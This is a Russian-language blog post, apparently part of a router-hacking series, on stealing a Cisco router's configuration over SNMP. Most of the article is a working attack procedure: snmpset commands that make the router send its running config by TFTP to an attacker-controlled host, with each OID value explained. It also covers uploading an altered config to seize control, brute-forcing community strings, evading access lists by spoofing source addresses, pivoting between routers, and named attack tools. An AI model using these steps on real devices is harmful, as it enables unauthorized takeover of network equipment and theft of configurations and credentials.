Categories: Router

Укрощение CISCO – как слить конфигурацию роутера через SNMP (ч. 4)

В предыдущих статьях Укрощение CISCO – брутим ключ к TACACS+ и Укрощение CISCO – брутим ключ к TACACS+ (часть 2) и Укрощение CISCO – как взломать роутер на растоянии. (ч. 3) Мы уже касались темы взлома CISCO сетевых устройств. Сегодня мы вам раскажем как через уязвимости SNMP протокола, получить конфигурацию CISCO роутера.

Хотелось бы отдельным пунктом выделить атаки на циски через SNMP. Хотя на большинстве устройств SNMP изначально отключен, но он достаточно часто включается для удаленного мониторинга и управления девайсами (к тому же на некоторых включен с общеизвестными комьюнити-стрингами).

С точки зрения самой атаки все вполне стандартно: бери любимую тулзу да бруть, если SNMP-сервис доступен. Важно здесь другое — что в случае успеха и «подбора» комьюнити с правами на запись мы можем получить полный контроль над устройством. Ведь мы можем и  скачать конфигурацию, и залить новую через SNMP. Вот последовательность команд:

snmpset -c private -v 2c cisco_ip 1.3.6.1.4.1.9.9.96.1.1.1.1.2.444 i 1
snmpset -c private -v 2c cisco_ip 1.3.6.1.4.1.9.9.96.1.1.1.1.3.444 i 4
snmpset -c private -v 2c cisco_ip 1.3.6.1.4.1.9.9.96.1.1.1.1.4.444 i 1
snmpset -c private -v 2c cisco_ip 1.3.6.1.4.1.9.9.96.1.1.1.1.5.444 a 192.168.1.2
snmpset -c private -v 2c cisco_ip 1.3.6.1.4.1.9.9.96.1.1.1.1.6.444 s confi g
snmpset -c private -v 2c cisco_ip 1.3.6.1.4.1.9.9.96.1.1.1.1.14.444 i 1

Несмотря на длину, она вполне проста:
• -c private — комьюнити-строка на запись;
• -v 2c — версия протокола SNMP (чаще всего именно эта);
• cisco_ip — IP-адрес циски;
• 1.3.6.1.4.1.9.9.96.1.1.1.1.2.444 — специальный цисковский OID с 444 — случайным числом;
• i — тип устанавливаемых данных (i — integer, a — IP-адрес, s — строка).

Фактически данная последовательность указывает циске, что и куда скопировать. Первая команда определяет протокол TFTP (1 — TFTP, 2 — FTP, 3 — RCP, 4 — SCP, 5 — SFTP). Вторая — что копируем запущенную конфигурацию (1 — файл в сети, 2 — файл с флеша циски, 3 — startup-конфиг, 4 — running- конфиг, 5 — терминал, 6 — фабричный startup-конфиг). Третий — что копируем на удаленный ресурс, то есть файл в сети. Здесь выборка аналогична предыдущей команде. Далее указываем и IP-адрес нашего хоста, где открыт TFTP-порт. Пятой командой задаем, под каким конфигурация будет сохранена у нас. И последней мы запускаем копирование, делая созданную предыдущими командами запись активной (1 — active, 2 — notInService, 3 — notReady, 4 — createAndGo, 5 — createAndWait, 6 — destroy).

Таким образом, представленная последовательность будет аналогом команды в IOS:

copy running-confi g tftp://192.168.1.2/confi g

Но это мы получили конфигурацию. Для того чтобы ее залить обратно, требуется практически та же последовательность, только команды 2 и 3 поменяются местами. Таким образом, мы можем модифицировать конфигурацию и «подстроить» ее под наши нужды.

Одну из типовых трудностей, возникающих на нашем пути, представляют access-листы — они могут достаточно четко ограничивать перечень хостов, с которых разрешен доступ на  SNMP-сервис циски.

Но в этом случае нам могут помочь как минимум два метода. Во-первых, важно помнить, что SNMP — это UDP-протокол, в котором отсутствует handshake, то есть мы можем подменить  IP-адрес отправителя на разрешенный access-листом, таким образом обходя ограничение. Второе решение — атаковать циску с другой циски. Например, есть специальный management-сегмент, недоступный обычным юзерам, через который доступен SNMP на цисках. Тогда в случае, если мы взломаем одну циску, мы с нее можем отправить SNMP-команды на другие циски (так как у нее есть доступ в management-сегмент), чтобы те слили нам конфиг. Формат команд внутри цисок таков:

snmp set v2c 192.168.1.2 private oid 1.3.6.1.4.1.9.9.96.1.1.1..1.2.444 integer 1

Если же вернуться к первой части, то для того, чтобы не копировать «вручную», можно воспользоваться тулзами. Вариант первый — cisc0wn (goo.gl/wSvCY4), второй — snmpblow (входит в Kali Linux). Snmpblow умеет подделывать IP-адреса, зато первая более  «автоматическая» и может сразу отпарсить конфиг на интересные штуки.

Click to rate this post!
[Total: 5 Average: 4.4]
cryptoworld

Специалист в области кибер-безопасности. Работал в ведущих компаниях занимающихся защитой и аналитикой компьютерных угроз. Цель данного блога - простым языком рассказать о сложных моментах защиты IT инфраструктур и сетей.

View Comments

Share
Published by
cryptoworld
Tags: ciscohack

Recent Posts

Лучший адаптер беспроводной сети для взлома Wi-Fi

Чтобы взломать сеть Wi-Fi с помощью Kali Linux, вам нужна беспроводная карта, поддерживающая режим мониторинга…

11 месяцев ago

Как пользоваться инструментом FFmpeg

Работа с консолью считается более эффективной, чем работа с графическим интерфейсом по нескольким причинам.Во-первых, ввод…

11 месяцев ago

Как создать собственный VPN-сервис

Конечно, вы также можете приобрести подписку на соответствующую услугу, но наличие SSH-доступа к компьютеру с…

11 месяцев ago

ChatGPT против HIX Chat: какой чат-бот с искусственным интеллектом лучше?

С тех пор как ChatGPT вышел на арену, возросла потребность в поддержке чата на базе…

11 месяцев ago

Разведка по Wi-Fi и GPS с помощью Sparrow-wifi

Если вы когда-нибудь окажетесь в ситуации, когда вам нужно взглянуть на спектр беспроводной связи, будь…

11 месяцев ago

Как обнаружить угрозы в памяти

Elastic Security стремится превзойти противников в инновациях и обеспечить защиту от новейших технологий злоумышленников. В…

11 месяцев ago